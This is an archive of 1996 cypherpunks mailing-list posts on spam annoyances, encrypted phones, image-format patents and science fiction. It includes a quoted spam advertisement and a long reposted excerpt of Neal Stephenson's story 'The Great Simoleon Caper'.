From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Fri, 22 Nov 1996 13:56:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Oh fun ... another mass spam mailer ...
Message-ID: <199611222155.NAA07879@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



Why don't these people take a hint?

Ern

------- Forwarded Message

Return-Path: name@worldnet.att.net 
Received: from mtigwc02.worldnet.att.net (mailhost.worldnet.att.net 
[204.127.129.4]) by xenon.chromatic.com (8.7.5/8.7.3) with ESMTP id NAA24359 
for <hua@chromatic.com>; Fri, 22 Nov 1996 13:52:28 -0800 (PST)
Received: from Default ([153.35.19.61]) by mtigwc02.worldnet.att.net
          (post.office MTA v2.0 0613 ) with SMTP id ANQ13190;
          Fri, 22 Nov 1996 19:35:25 +0000
From: removenow@hotmail.com
Date: Fri, 22 Nov 1996 14:36:56 PST
Subject: As featured in Business Week
Message-ID: <19961122174156.ANQ13190@Default>

Press reply for removal

As Featured in BUSINESS WEEK MAGAZINE
& ENTREPENURE MAGAZINE ..December issue.

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
SPECIAL OFFER GOOD UNTIL DECEMBER 26th 1996 ONLY
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

free free free free free free free free free free free free free free free
E-MAIL WORKS v3.1a FREE!! WITH PURCHACE OF SECURE 
BULK E-MAILING AND WEB SITE HOSTING SERVICES!!!!!!!!!!!!!
free free free free free free free free free free free free free free free

     That's Right!! When you order our secure bulk e mail hosting services you 
get the best
& most advanced bulk e-mail package for FREE. This product sold for $499 is 
now free!!!!.
Not just a demo, the fully functional version!!!

             Just e mail your request to    1webguy@slip.net

     E Mail Works v3.1 is by far the most advanced bulk e-mail software 
available
 on the market. It's power and depth are only matched by it' s ease of use. 

                                Features
        I
           Sends at 13000 to 15000 per hour with 14.4 modem 
        II
           Posts to thousands of news groups automatically
       III
           Collects at 75000 per 24 hours
           Collect from Aol, Comp-U-Serve, Prodigy & all others
       IV
           Works while your computer is-surfing-getting e mail or word 
processing.
        V
           Easy to use remove name feature.
       VI
           Parsing table 45000 to 100,000 per hour
       VII
           Stand alone - NO Pegasus-Eudora-Freedom- or other email program
           needed
      VIII
           Sends & Gathers & Parsing at the same time! 
       IX
           Marketing Tables
        X
           Time & date stamp on all mailings
       XI
           Filtering system
       XII
           Send live links
      XIII
           Repair data base
       XIV
           Merge data base
       XV
           View data base
       XVI
           Pull down help menu's

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
THE FIRST WEB SITE HOSTING SERVICE FOR
PROFESSIONAL BULK E-MAIL MARKETERS!!!!
Xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

ONLY $149 per month

With this unique service you send mail using your local dial-up through our
secure SMTP port. The mail you send is first filtered through our remove name
list and then sent.

I
         SECURE T3 CONNECTION WEB SITE HOSTING
          When SoftCell becomes you postmaster you will never have your site
          ripped down again or have you e mail address change
       II
          10 MG WEB DOMAIN
          We transfer or register your domain with internic 
       III
          POP ACCOUNT REMOVE NAMES
          All mail is parsed against several large remove name lists as you 
mail
       IV
          5 MG FLAME PROOF E-MAIL BOX
          We will not except multiple message or unmarked attachments from any 
user.
       V
          FIRE WALL
          Over 70,000 e mail addresses that can not access our server
       VI
          AUTO RESPONDER
          Easy and fast responder

------- End of Forwarded Message






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 22 Nov 1996 14:01:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Constraining the Program Counter
Message-ID: <v02140b00aebbd272eb96@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


You could build a fairly secure system if all of the executable
code were confined to ROMs.

Is there a way to confine the PC of any popular processors so
that it can only execute code in the ROM?

Ideally, it would be possible to do this with cheap off the
shelf hardware.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip M Hallam-Baker" <hallam@ai.mit.edu>
Date: Fri, 22 Nov 1996 11:26:25 -0800 (PST)
To: "Vince Callaway" <vince@web.wa.net>
Subject: Re: Patent Fight Could Add to Cost of Inter
Message-ID: <199611221926.LAA15514@toad.com>
MIME-Version: 1.0
Content-Type: text/plain




----------

> > ``We believe it's important to draw a line in the sand and make 
> > them prove infringement,'' said CompuServe spokeswoman Gail 
> > Whitcomb. ``We think their claim is way too broad.'' 
> 
> This is quite a statement coming from a company that flexed its muscles
on
> the .GIF file spec. about 3 years ago.
> 
> If I remember right Compuserve caused some some major changes in RIP and
> HTTP developement.  Until that time the only graphic format supported in
> Mosaic was .GIF.  JPEG was promptly added and there was hot debate about
> the issue.

Having been at CERN at the time and having been the first person to 
incorporate JPEG into a browser (Arena) I know this to be incorrect.

We intended to put JPEG into the browsers from before the time that 
Marc introduced the IMG tag. Indeed a principle point of discussion
on the list was how to cope with multiple formats. We knew that
GIF was poor and that 24 bit screens would soon become the standard.
On the other hand GIF was better for icons, line drawings and such
and had better support from tools. The question was how to do content
negotiation well and support the best configuration for the particular 
hardware. Marc did not exactly allow much time for comment on the
list and chose to interpret the constructive criticism of his IMG tag
as opposition to the idea of transcluded images. Actually the question
was whether images should be a special class of transcluded object,
it really should be possible to transclude HTML within HTML, something
that frames attempts to do but not particularly well.

The patent issue was not of CompuServe's making. They were unaware of the
UNISYS patent when they developed the spec and had they known about it
would have developed GIF differently. When UNISYS asserted their patent
rights CompuServe had no choice to pay up, they did however negotiate
a blanket license agreement which has assisted the rest of the industry
in making agreements.

The main effect of the patent issue was to give added impetus to the 
PNG (prn. "Ping!") which is a patent free extension of the GIF idea.
Unlike GIF PNG is designed to work on the 24 bit displays we use
today and provide a good, general purpose standard for interchange of
images in a lossless manner. JPEG is fine for presentation of images
but useless as an editing format since it looses information on each 
cycle. It is also poor at handling line drawings and other non 
photographic sources (the P in JPEG is Photographic).

It would be nice if the industry would support PNG more widely since
its probably the best piece of original work to come out of the
Web consortium. I believe that Microsoft are supporting it in their
next browser release and even if they don't both 4.0 browsers are
much better at supporting plug ins. 


		Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 22 Nov 1996 12:16:38 -0800 (PST)
To: paratama@idola.net.id
Subject: Re: FW: RE: FW: Viel Glueck!
In-Reply-To: <9611220201.AA05596@merak.idola.net.id>
Message-ID: <Pine.BSF.3.91.961122140557.3076F-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 22 Nov 1996 paratama@idola.net.id wrote:

> At 11:00 PM 11/21/96 +0100, you wrote:
> >> GOOD LUCK TOTEM
> >>

Oh No! It's the dread totem virus again!

;)

-r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <jmr@shopmiami.com>
Date: Fri, 22 Nov 1996 11:18:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: RE: Mass-market crypto phones
Message-ID: <199611221917.OAA38470@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Sat Nov 23 14:16:14 1996
Peter Trei wrote:

<snip>

> It's kind of pathetic - I'm sure that the billions lost to cellular fraud
> far outweigh the value of crimes that the  LEA groups have been 
> able  prevent by preserving their ability to illegally eavesdrop on 
> cell calls without a warrant.

I agree, but to the LEAs, the "value of crimes" includes asset forfeiture 
"profits," which change that accounting in favor of eavesdropping (in their 
minds, at least). Of course, cellular fraud is paid for by others who, if 
they're politically active at all, are likely to demand even more money for 
the LEAs. A win -- win situation (in their minds, at least).
JMR


Regards, Jim Ray
DNRC Minister of Encryption Advocacy

One of the "legitimate concerns of law enforcement" seems to be
that I was born innocent until proven guilty and not the other
way around. -- me

Please note new 2000bit PGPkey & address <jmr@shopmiami.com>
PGP id.A7D63DA9 98 1F 39 BA 93 86 B4 F5  57 52 64 0E DA BA 2C 71


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEPAwUBMpdNgjUhsGSn1j2pAQFCbQfOJss3rMfEaWt1kv8oNfiOvwtoaa15s6lc
vOVqG9dBMKCI41/x+k8Jzsb4pVvQOu4cXtUvIDOojY3JvmEzO9EVl125o8/pDxZy
iNqgpLic8Px0R/uASJCj9T0nnFemRmY+QznaQNMdgLs92nOHuEK6Kfi66lqEGmda
CxeuOSdijI+U741bU1a7xjqhc0uwj4ycsjmBB9nOKPSIsbZZYkYcDirT0z/l1F48
aVFphyzek4FjhIaFNFTdGs9YUkJM7hJJ0EfpxeWUeBAfyjkphrATXnW2WGF/iExo
32h6EYgso94VCT7LiWfK20pQ4Mk43i6xemjDdPS+9oS93Q==
=eZ9E
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 22 Nov 1996 11:24:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: re: [NOISE] sci fi
Message-ID: <199611221923.LAA15484@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Fri, 22 Nov 1996 18:48:22 +0100 (MET)
> From:          Asgaard <asgaard@Cor.sos.sll.se>
> To:            cypherpunks@toad.com
> Subject:       re: sci fi

> On Thu, 21 Nov 1996, Alan Olsen wrote:
 
> > For absolute brain candy, I recommend "Star Smashers of the Galaxy
> > Rangers".  EE.Doc Smith meets the Hardy Boys.  The ending I had to read
> > twice...
 
> A rather odd book that I found immensely stimulating is
> 'Venus on a halfshell' by a Nym (allegedly for Kurt Vonnegut,
> who in most of his books under his own name now and then
> refers to some hilarious non-existing SF story by this 'author').

> Asgaard

"Star Smashers" first appeared under a wierd 'Generic Book' imprint
in the late 70s/early 80s. There were a series of them - with plain
white covers and black capital titles such as "SCIENCE FICTION",
 "ROMANCE", "WESTERN", "MYSTERY", etc, all actually by well 
respected authors in their respective fields. I think "Star
Smashers' was by Harry Harrison, but am not sure.

VotHS claimed to have been written by Kilgore Trout, an third rate
SF author who exists only in the works of Kurt Vonnegut. However,
the actual author is Phillip Jose Farmer, whom Kurt granted permission
to use the character as a joke at a party. Farmer then wrote and 
published  VotHS, perfectly imitating Vonnegut's style, to Vonnegut's 
great dismay.

Peter Trei
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 22 Nov 1996 14:36:32 -0800 (PST)
To: Sean Roach <cypherpunks@toad.com
Subject: Re: Mass-market crypto phones
Message-ID: <199611222236.OAA27264@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:50 AM 11/22/96 -0800, Sean Roach wrote:
>At 09:10 AM 11/21/96 -0500, Clay Olbon II wrote:
>>A while back, Eric Blossom posted a URL for a mass-market, phone encyrption
>>device (http://www.comsec.com/)...

>At first this seemed to be a challenging goal as public key encryption (at
>least the type of which I am aware) requires a public key ring, but then I
>thought, what would be the point in real time communitation?

Both Eric's product and PGPhone use Diffie-Hellman key exchange.  They
protect against man-in-the-middle attacks by displaying (part of) the
resulting symmetric key and having the phone's users verify they are both
working with the same key in the conversation.  Until the AIs/eavesdroppers
get good enough to imitate a person on the phone, this verification
technique is good enough.


-------------------------------------------------------------------------
Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
(408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Fri, 22 Nov 1996 15:10:43 -0800 (PST)
To: Mullen Patrick <Mullen.Patrick@mail.ndhm.gtegsc.com>
Subject: RE: Mass-market crypto phones
In-Reply-To: <n1363438071.71871@mail.ndhm.gtegsc.com>
Message-ID: <Pine.3.89.9611221558.A28484-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain


> I was going to just listen to the way this thread is going because I find
> it fascinating, but now that it has been spelled out, I must make a very
> important distinction between my idea and PGPFone, WebPhone, etc. --
> These are Web-based programs designed to speak over very long distances
> for "free" (neglecting ISP charges, etc.), adding the extra functionality
> of encrypting your data along the way so sniffers, etc can't listen in 
> on your conversation.

PGPfone works over POTS and IP. It was not originally designed to work
over IP.  The issues raised in my first post apply to modem/modem
connections and IP based implementations. The issues raised in my second
post apply to IP based implementations only (that's not quite true, but I
don't want to go any deeper into it). 

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 22 Nov 1996 14:13:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: HP-48G is a perfect toy, thanks to all
Message-ID: <199611222201.QAA09675@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Thanks to all who recommended me to buy an HP-48G calculator.
It is one of the most perfect toys that an adult can play with.

I used a programmable stack calculator when I was in high school
and it is a true pleasure.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Date: Fri, 22 Nov 1996 14:35:55 -0800 (PST)
To: "Lucky Green" <shamrock@netcom.com>
Subject: RE: Mass-market crypto phones
Message-ID: <n1363438071.71871@mail.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


_______________________________________________________________________________
From: Lucky Green on Fri, Nov 22, 1996 14:52
<snip>

>quality is fine. Note that a fast IP connection may or may not suffice. 
                                   ^^^^^^^^^^^^^
<snip>
 
>sending UDP packets over the Internet new problems arise. One packet 
         ^^^^^^^^^^^          ^^^^^^^^
<snip>

>--Lucky

I was going to just listen to the way this thread is going because I find
it fascinating, but now that it has been spelled out, I must make a very
important distinction between my idea and PGPFone, WebPhone, etc. --
These are Web-based programs designed to speak over very long distances
for "free" (neglecting ISP charges, etc.), adding the extra functionality
of encrypting your data along the way so sniffers, etc can't listen in 
on your conversation.

My encryptophone(tm) :-) is purely a modem-modem protocol.  This way, even at
14.4k you get all of your throughput.  No TCP/IP overhead.  No busy Net.
No "Why won't my ISP hold a connection longer than TWO MINUTES!?!?".  The
idea I was tossing around was a simple modem program which takes digitized
voice, encrypts it, pumps it through the phone line directly to the modem
on the other side which undoes it all.  (Yes, I know this is a simplified
view.)  I also know it may not be as useful as the web-based products, but
I also know you don't have to worry about the aforementioned problems and
neither party has to have a Net account.  This eliminates some of the
problems which have been sent to me.  Of course, some of the problems
still apply and must be addressed.  I guess now's the time to admit that
the first and foremost problem is that I have never programmed my soundcard...

I appreciate the tips and pointers everyone has been giving me tremendously.
Hopefully, this thread doesn't do a complete reversal, because I am storing
all hints/suggestions/tips to be used when I can finally get this project
going.  (I'm stubborn.  I need to at least try it, if for no other reason
than to get the knowledge... :-)

Thanks!
PM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 22 Nov 1996 15:40:48 -0800 (PST)
To: Sean Roach <cypherpunks@toad.com
Subject: Re: Why I Don't Read SF Much Anymore
In-Reply-To: <199611221950.LAA15893@toad.com>
Message-ID: <v03007833aebbe6905c92@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:50 pm -0500 11/22/96, Sean Roach wrote:
>I saved the whole magazine, I can copy it for you if you like.  I thought
>that I had the magazine in the dorm room but I can't seem to find it.

I've got an offer of sending me an electronic copy in progress. I'll dump
it to thumper when I get it and blatantly violate a few copyrights when I
get it. :-).

Cheers,
Bob



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 22 Nov 1996 15:35:46 -0800 (PST)
To: roach_s@alph.swosu.edu (Sean Roach)
Subject: Re: Why I Don't Read SF Much Anymore
In-Reply-To: <199611221950.LAA15893@toad.com>
Message-ID: <199611222331.SAA11266@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



| >His, "Great Samolean Caper" for Time/Pathfinder was pure cryptoanarchy...

| I saved the whole magazine, I can copy it for you if you like.  I thought
| that I had the magazine in the dorm room but I can't seem to find it.

Once available at:
http://www.pathfinder.com/time/magazine/domestic/1995/special/special.toc.html

TIME Domestic

SPECIAL ISSUE, Spring 1995 Volume 145, No. 12

Return to Contents page 

FICTION
THE GREAT SIMOLEON CAPER
BY NEAL STEPHENSON

Hard to imagine a less attractive life-style for a young man just out
of college than going back to Bismarck to live with his parents -
unless it's living with his brother in the suburbs of Chicago, which,
naturally, is what I did. Mom at least bakes a mean cherry pie.  Joe,
on the other hand, got me into a permanent emotional headlock and
found some way, every day, to give me psychic noogies. For example,
there was the day he gave me the job of figuring out how many jelly
beans it would take to fill up Soldier Field.

Let us stipulate that it's all my fault; Joe would want me to be clear
on that point. Just as he was always good with people, I was always
good with numbers. As Joe tells me at least once a week, I should have
studied engineering. Drifted between majors instead, ended up with a
major in math and a minor in art - just about the worst thing you can
put on a job app.

Joe, on the other hand, went into the ad game. When the Internet and
optical fiber and HDTV and digital cash all came together and turned
into what we now call the Metaverse, most of the big ad agencies got
hammered - because in the Metaverse, you can actually whip out a gun
and blow the Energizer Bunny's head off, and a lot of people did. Joe
borrowed 10,000 bucks from Mom and Dad and started this clever young
ad agency. If you've spent any time crawling the Metaverse, you've
seen his work - and it's seen you, and talked to you, and followed you
around.

Mom and Dad stayed in their same little house in Bismarck, North
Dakota. None of their neighbors guessed that if they cashed in their
stock in Joe's agency, they'd be worth about $20 million. I nagged
them to diversify their portfolio - you know, buy a bushel basket of
Krugerrands and bury them in the backyard, or maybe put a few million
into a mutual fund. But Mom and Dad felt this would be a no-confidence
vote in Joe. "It'd be," Dad said, "like showing up for your kid's
piano recital with a Walkman."

Joe comes home one January evening with a magnum of champagne. After
giving me the obligatory hazing about whether I'm old enough to drink,
he pours me a glass. He's already banished his two sons to the Home
Theater. They have cranked up the set-top box they got for Christmas.
Patch this baby into your HDTV, and you can cruise the Metaverse,
wander the Web and choose from among several user-friendly operating
systems, each one rife with automatic help systems, customer-service
hot lines and intelligent agents. The theater's subwoofer causes our
silverware to buzz around like sheet-metal hockey players, and
amplified explosions knock swirling nebulas of tiny bubbles loose from
the insides of our champagne glasses. Those low frequencies must
penetrate the young brain somehow, coming in under kids' media-hip
radar and injecting the edfotainucational muchomedia bitstream direct
into their cerebral cortices.

"Hauled down a mother of an account today," Joe explains. "We hype
cars. We hype computers. We hype athletic shoes. But as of three hours
ago, we are hyping a currency."

"What?" says his wife Anne.

"Y'know, like dollars or yen. Except this is a new currency."

"From which country?" I ask. This is like offering lox to a dog: I've
given Joe the chance to enlighten his feckless bro. He hammers back
half a flute of Dom Perignon and shifts into full-on Pitch Mode.

"Forget about countries," he says. "We're talking Simoleons - the
smart, hip new currency of the Metaverse."

"Is this like E-money?" Anne asks.

"We've been doing E-money for e-ons, ever since automated-teller
machines." Joe says, with just the right edge of scorn. "Nowadays we
can use it to go shopping in the Metaverse. But it's still in U.S.
dollars. Smart people are looking for something better."

That was for me. I graduated college with a thousand bucks in savings.
With inflation at 10% and rising, that buys a lot fewer Leinenkugels
than it did a year ago.

"The government's never going to get its act together on the budget,"
Joe says. "It can't.  Inflation will just get worse. People will put
their money elsewhere."

"Inflation would have to get pretty damn high before I'd put my money
into some artificial currency," I say.

"Hell, they're all artificial," Joe says. "If you think about it,
we've been doing this forever.  We put our money in stocks, bonds,
shares of mutual funds. Those things represent real assets -
factories, ships, bananas, software, gold, whatever. Simoleons is just
a new name for those assets. You carry around a smart card and spend
it just like cash. Or else you go shopping in the Metaverse and spend
the money online, and the goods show up on your doorstep the next
morning."

I say, "Who's going to fall for that?"

"Everyone," he says. "For our big promo, we're going to give Simoleons
away to some average Joes at the Super Bowl. We'll check in with them
one, three, six months later, and people will see that this is a safe
and stable place to put their money."

"It doesn't inspire much confidence," I say, "to hand the stuff out
like Monopoly money."

He's ready for this one. "It's not a handout. It's a sweepstakes." And
that's when he asks me to calculate how many jelly beans will fill
Soldier Field.

Two hours later, I'm down at the local galaxy-class grocery store, in
Bulk: a Manhattan of towering Lucite bins filled with steel-cut rolled
oats, off-brand Froot Loops, sun-dried tomatoes, prefabricated
s'mores, macadamias, French roasts and pignolias, all dispensed into
your bag or bucket with a jerk at the handy Plexiglas guillotine. Not
a human being in sight, just robot restocking machines trundling back
and forth on a grid of overhead catwalks and surveillance cameras
hidden in smoked-glass hemispheres. I stroll through the gleaming
Lucite wonderland holding a perfect 6-in. cube improvised from duct
tape and cardboard. I stagger through a glitter gulch of Gummi fauna,
Boston baked beans, gobstoppers, Good & Plenty, Tart'n Tiny. Then,
bingo: bulk jelly beans, premium grade. I put my cube under the spout
and fill it.

Who guesses closest and earliest on the jelly beans wins the
Simoleons. They've hired a Big Six accounting firm to make sure
everything's done right. And since they can't actually fill the
stadium with candy, I'm to come up with the Correct Answer and supply
it to them and, just as important, to keep it secret.

I get home and count the beans: 3,101. Multiply by 8 to get the number
in a cubic foot: 24,808. Now I just need the number of cubic feet in
Soldier Field. My nephews are sprawled like pithed frogs before the
HDTV, teaching themselves physics by lobbing antimatter bombs onto an
offending civilization from high orbit. I prance over the black
zigzags of the control cables and commandeer a unit.

Up on the screen, a cartoon elf or sprite or something pokes its head
out from behind a window, then draws it back. No, I'm not a paranoid
schizophrenic - this is the much-hyped intelligent agent who comes
with the box. I ignore it, make my escape from Gameland and blunder
into a lurid district of the Metaverse where thousands of infomercials
run day and night, each in its own window. I watch an ad for Chinese
folk medicines made from rare-animal parts, genetically engineered and
grown in vats.  Grizzly-bear gallbladders are shown growing like
bunches of grapes in an amber fluid.

The animated sprite comes all the way out, and leans up against the
edge of the infomercial window. "Hey!" it says, in a goofy, exuberant
voice, "I'm Raster! Just speak my name - that's Raster - if you need
any help."

I don't like Raster's looks. It's likely he was wandering the streets
of Toontown and waving a sign saying WILL ANNOY GROWNUPS FOR FOOD
until he was hired by the cable company. He begins flying around the
screen, leaving a trail of glowing fairy dust that fades much too
slowly for my taste.

"Give me the damn encyclopedia!" I shout. Hearing the dread word, my
nephews erupt from the rug and flee.

So I look up Soldier Field. My old Analytic Geometry textbook, still
flecked with insulation from the attic, has been sitting on my thigh
like a lump of ice. By combining some formulas from it with the
encyclopedia's stats . . .

"Hey! Raster!"

Raster is so glad to be wanted that he does figure eights around the
screen. "Calculator!" I shout.

"No need, boss! Simply tell me your desired calculation, and I will do
it in my head!"

So I have a most tedious conversation with Raster, in which I estimate
the number of cubic feet in Soldier Field, rounded to the nearest
foot. I ask Raster to multiply that by 24,808 and he shoots back:
537,824,167,717.

A nongeek wouldn't have thought twice. But I say, "Raster, you have
Spam for brains. It should be an exact multiple of eight!" Evidently
my brother's new box came with one of those defective chips that makes
errors when the numbers get really big.

Raster slaps himself upside the head; loose screws and transistors
tumble out of his ears.  "Darn! Guess I'll have to have a talk with my
programmer!" And then he freezes up for a minute.

My sister-in-law Anne darts into the room, hunched in a don't-mind-me
posture, and looks around. She's terrified that I may have a date in
here. "Who're you talking to?"

"This goofy I.A. that came with your box," I say. "Don't ever use it
to do your taxes, by the way."

She cocks her head. "You know, just yesterday I asked it for help with
a Schedule B, and it gave me a recipe for shellfish bisque."

"Good evening, sir. Good evening, ma'am. What were those numbers
again?" Raster asks. Same voice, but different inflections - more
human. I call out the numbers one more time and he comes back with
537,824,167,720.

"That sounds better," I mutter.

Anne is nonplussed. "Now its voice recognition seems to be working
fine."

"I don't think so. I think my little math problem got forwarded to a
real human being.  When the conversation gets over the head of the
built-in software, it calls for help, and a human steps in and takes
over. He's watching us through the built-in videocam," I explain,
pointing at the fish-eye lens built into the front panel of the
set-top box, "and listening through the built-in mike."

Anne's getting that glazed look in her eyes; I grope for an analog
analogy. "Remember The Exorcist? Well, Raster has just been possessed,
like the chick in the flick. Except it's not just Beelzebub. It's a
customer-service rep."

I've just walked blind into a trap that is yawningly obvious to Anne.
"Maybe that's a job you should apply for!" she exclaims.

The other jaw of the trap closes faster than my teeth chomping down on
my tongue: "I can take your application online right now!" says
Raster.

My sister-in-law is the embodiment of sugary triumph until the next
evening, when I have a good news/bad news conversation with her. Good:
I'm now a Metaverse customer-service rep. Bad: I don't have a cubicle
in some Edge City office complex. I telecommute from home - from her
home, from her sofa. I sit there all day long, munching through my
dwindling stash of tax-deductible jelly beans, wearing an operator's
headset, gripping the control unit, using it like a puppeteer's rig to
control other people's Rasters on other people's screens, all over the
U.S. I can see them - the wide-angle view from their set-top boxes is
piped to a window on my screen. But they can't see me - just Raster,
my avatar, my body in the Metaverse.

Ghastly in the mottled, flattening light of the Tube, people ask me
inane questions about arithmetic. If they're asking for help with
recipes, airplane schedules, child-rearing or home improvement,
they've

already been turfed to someone else. My expertise is pure math only.

Which is pretty sleepy until the next week, when my brother's agency
announces the big Simoleons Sweepstakes. They've hired a knot-kneed
fullback as their spokesman. Within minutes, requests for help from
contestants start flooding in. Every Bears fan in Greater Chicago is
trying to calculate the volume of Soldier Field. They're all doing it
wrong; and even the ones who are doing it right are probably using the
faulty chip in their set-top box. I'm in deep conflict-of-interest
territory here, wanting to reach out with Raster's stubby,
white-gloved, three-fingered hand and slap some sense into these
people.

But I'm sworn to secrecy. Joe has hired me to do the calculations for
the Metrodome, Three Rivers Stadium, RFK Stadium and every other
N.F.L. venue. There's going to be a Simoleons winner in every city.

We are allowed to take 15-minute breaks every four hours. So I crank
up the Home Theater, just to blow the carbon out of its cylinders, and
zip down the main street of the Metaverse to a club that specializes
in my kind of tunes. I'm still "wearing" my Raster uniform, but I
don't care - I'm just one of thousands of Rasters running up and down
the street on their breaks.

My club has a narrow entrance on a narrow alley off a narrow side
street, far from the virtual malls and 3-D video-game amusement parks
that serve as the cash cows for the Metaverse's E-money economy.
Inside, there's a few Rasters on break, but it's mostly people
"wearing" more creative avatars. In the Metaverse, there's no part of
your virtual body you can't pierce, brand or tattoo in an effort to
look weirder than the next guy.

The live band onstage - jacked in from a studio in Prague - isn't very
good, so I duck into the back room where there are virtual racks full
of tapes you can sample, listening to a few seconds from each song. If
you like it, you can download the whole album, with optional
interactive liner notes, videos and sheet music.

I'm pawing through one of these racks when I sense another avatar,
something big and shaggy, sidling up next to me. It mumbles something;
I ignore it. A magisterial throat-clearing noise rumbles in the
subwoofer, crackles in the surround speakers, punches through cleanly
on the center channel above the screen. I turn and look: it's a
heavy-set creature wearing a T shirt emblazoned with a logo HACKERS
1111. It has very long scythe-like claws, which it uses to

grip a hot-pink cylinder. It's much better drawn than Raster; almost
Disney-quality.

The sloth speaks: "537,824,167,720."

"Hey!" I shout. "Who the hell are you?" It lifts the pink cylinder to
its lips and drinks. It's a can of Jolt. "Where'd you get that
number?" I demand. "It's supposed to be a secret."

"The key is under the doormat," the sloth says, then turns around and
walks out of the club.

My 15-minute break is over, so I have to ponder the meaning of this
through the rest of my shift. Then, I drag myself up out of the couch,
open the front door and peel up the doormat.

Sure enough, someone has stuck an envelope under there. Inside is a
sheet of paper with a number on it, written in hexadecimal notation,
which is what computer people use: 0A56 7781 6BE2 2004 89FF 9001 C782
- and so on for about five lines.

The sloth had told me that "the key is under the doormat," and I'm
willing to bet many Simoleons that this number is an encryption key
that will enable me to send and receive coded messages.

So I spend 10 minutes punching it into the set-top box. Raster shows
up and starts to bother me: "Can I help you with anything?"

By the time I've punched in the 256th digit, I've become a little
testy with Raster and said some rude things to him. I'm not proud of
it. Then I hear something that's music to my ears: "I'm sorry, I
didn't understand you," Raster chirps. "Please check your cable
connections - I'm getting some noise on the line."

A second figure materializes on the screen, like a digital genie: it's
the sloth again. "Who the hell are you?" I ask.

The sloth takes another slug of Jolt, stifles a belch and says, "I am
Codex, the Crypto-Anarchist Sloth."

"Your equipment requires maintenance," Raster says. "Please contact
the cable company."

"Your equipment is fine," Codex says. "I'm encrypting your back
channel. To the cable company, it looks like noise. As you fig

ured out, that number is your personal encryption key. No government
or corporation on earth can eavesdrop on us now."

"Gosh, thanks," I say.

"You're welcome," Codex replies. "Now, let's get down to biz. We have
something you want. You have something we want."

"How did you know the answer to the Soldier Field jelly-bean
question?"

"We've got all 27," Codex says. And he rattles off the secret numbers
for Candlestick Park, the Kingdome, the Meadowlands . . .

"Unless you've broken into the accounting firm's vault," I say,
"there's only one way you could have those numbers. You've been
eavesdropping on my little chats with Raster.  You've tapped the line
coming out of this set-top box, haven't you?"

"Oh, that's typical. I suppose you think we're a bunch of socially
inept, acne-ridden, high-IQ teenage hackers who play sophomoric pranks
on the Establishment."

"The thought had crossed my mind," I say. But the fact that the
cartoon sloth can give me such a realistic withering look, as he is
doing now, suggests a much higher level of technical sophistication.
Raster only has six facial expressions and none of them is very good.

"Your brother runs an ad agency, no?"

"Correct."

"He recently signed up Simoleons Corp.?"

"Correct."

"As soon as he did, the government put your house under full-time
surveillance."

Suddenly the glass eyeball in the front of the set-top box is looking
very big and beady to me. "They tapped our infotainment cable?"

"Didn't have to. The cable people are happy to do all the dirty work -
after all, they're beholden to the government for their monopoly. So
all those calculations you did using Raster were piped straight to the
cable company and from there to the government. We've got a mole in
the government who cc'd us everything through an anonymous remailer in
Jyvaskyla, Finland."

"Why should the government care?"

"They care big-time," Codex says. "They're going to destroy Simoleons.
